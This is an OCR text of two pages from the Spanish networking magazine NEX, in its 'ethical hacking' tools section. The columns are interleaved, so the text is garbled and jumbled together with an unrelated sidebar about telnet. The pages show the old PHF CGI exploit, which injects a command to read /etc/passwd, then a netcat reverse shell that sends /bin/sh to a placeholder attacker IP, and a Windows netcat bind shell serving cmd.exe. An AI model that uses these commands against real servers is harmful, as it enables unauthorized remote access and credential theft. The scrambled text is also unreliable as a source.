cutaba cualquier comando que los tenía. También se usaba para
Es posible realizar una variante al esquema anteri-
siguiese con los privilegios de UID consultar datos a distancia, como
que corriese el servidor Web. datos personales en máquinas ac-
or usando netcat (nc) en la máquina víctima.
cesibles por red, información bibli-
Netcat es muy popular en sistemas Unix y muy El exploit original era: ográfica, etc.
probablemente esté activo.Del mismo modo que
"reverse telnet" este "back channel" es un proceso /cgi-bin/phf?Qalias=x%0a/bin/ Su mayor problema es de seguri-
de dos pasos: cat%20/etc/password dad, ya que todos los nombres de
usuario y contraseñas necesarias
1.habilitar un listener (escucha) dentro de la La línea anterior logra hacer cat del para entrar en las máquinas viaja-
máquina atacante: archivo de passwords (cat es un ban por la red sin cifrar (en ``texto
#nc -l -n -v -p 80 comando UNIX que concatena claro). Esto permite que cualquiera
2.Ejecutar en la máquina víctima,por ejemplo, vía
archivos). Es decir lograba darme que espíe el tráfico de la red pueda
los UID y las passwords encriptadas obtener los nombres de usuario y
el exploit PHF (asumimos que los archivos de
#nc -e /bin/sh IP_de_maquina_atacante 80
contraseñas, y así acceder él
passwords no están "shadowed"). también a todas esas máquinas.
Usado de este modo un hacker con Dejó de usarse casi totalmente
Cuando se ejecute este comando en el web- poca experiencia se hubiese dedi- hace unos años, cuando apareció y
server, se creará un "back channel" nc, otorgán- cado posteriormente a crackear el se popularizó el SSH, que puede
dole un shell (/bin/sh) a nuestro atacante. archivo de passwords y logonearse describirse como una versión
al sistema vulnerable. cifrada de telnet.

Revista de Networking y Programación / NEX - 77|


ETHICAL HACKING - TOOLS

LA NAVAJA SUIZA
(Si desea conocer más sobre netcat, lea el artícu-
lo de Leonel Becchio en NEX IT Specialist #14,pag
73, Marzo 2005).

E
s muy acertado denominar de tal archivos. Asimismo Netcat se utiliza para -l (fuerza a netcat a escuchar a conex-
manera a Netcat, dada la amplia can- concatenar sockets TCP y UDP. Si desea iones entrantes)
tidad de tareas que permite que sean conocer la historia de Netcat y sus autores -n (fuerza a netcat a aceptar direcciones
hechas. Netcat es la segunda her- Hobbit y Weld Pond, recomendamos leer IP numéricas y no realizar lookups DNS)
ramienta más popular utilizada en el mundo el artículo "cDc (Cult of the Dead Cow), -v (controla el nivel de verbosidad (can-
de la seguridad informática. Con ella puede The L0pht y Netcat" publicado en NEX It tidad de info que da)
reemplazarse a una suite de herramientas. Specialist #14, Marzo 2005. -p xxx (fuerza a netcat a usar el puerto
Netcat es un cliente telnet, básicamente La utilidad fue desarrollada para ser tra- xxx para conexiones salientes. El
su función primordial es la lecto-escritura bajada desde una consola por línea de co- parámetro puede ser numérico o un
de datos a través de conexiones TCP o mandos invocando el comando nc . Sería nombre listado en el archivo de servicios.
UDP. Por tal motivo, como puede ser es- demasiado extenso mencionar todos los Si -p no es usado, netcat se ligará a
pecificado el puerto de trabajo, Netcat parámetros disponibles para usar con cualquier puerto no usado que le de el
puede ser usado como scanner de Netcat. Pero veamos los utilizados en sistema, a menos que usemos la opción -r.
puertos, redirector de puertos, puerta de nuestro artículo: -e (ejecuta un programa)
acceso trasero (backdoor) y otras tantas
cosas. Tal vez no sea la mejor herramienta
o la más cómoda para trabajar, pero esta Obtener una consola de comandos de un servidor
utilidad brinda lo necesario para suplir los
requerimientos de una completa tarea de
hacking por sí sola. La ventaja es que El siguiente ejemplo será muy instructivo. con la misma línea de comando que cuando
Netcat puede trabajar como cliente y Intente realizarlo, de modo de entender el terminó la conexión.
servidor. Debemos aclarar que como todo poder de netcat. En el sistema cliente (desde el cuál nos
cliente telnet, cada cosa que tipeemos, conectaremos al servidor) tipee:
primero viaja hacia la consola remota y si En el servidor corriendo Windows y con
es que existe un puerto a la escucha, netcat instalado tipee lo siguiente en una nc IP_destino 1234
vuelve y es mostrada en la consola local. consola de comandos:
Por tal motivo deberemos colocar dos Este comando hace que netcat se conecte al
consolas corriendo Netcat, una local y una nc -l -p 1234 -d -e cmd.exe -L servidor cuyo IP es IP_destino, sobre el
funcionará como remota. puerto 1234. Nos aparecerá una consola
Netcat proviene de la época de los sis- -l pone a netcat en modo escucha, -p 1234 pero los comandos que allí topeemos se eje-
temas operativos Unix, de hecho fue que use el puerto 1234, -d permite correr a cutarán sobre el servidor. Para salir, tipee
lanzado primeramente para aquellos sis- netcat "detached" (separado) de la consola, "exit". Esto nos retornará a la consola origi-
temas y posteriormente apareció la el -e cmd.exe le indica a netcat que ejecute nal. Podremos reconectarnos en cualquier
versión para el entorno Windows NT. Su el programa cmd.exe cuando realiza una momento ya que comenzamos netcat en el
nombre es una derivación del comando conexión, y el -L hará un restart de netcat servidor con la opción -L.
Unix cat que se utiliza para concatenar

|78 - NEX / Revista de Networking y Programación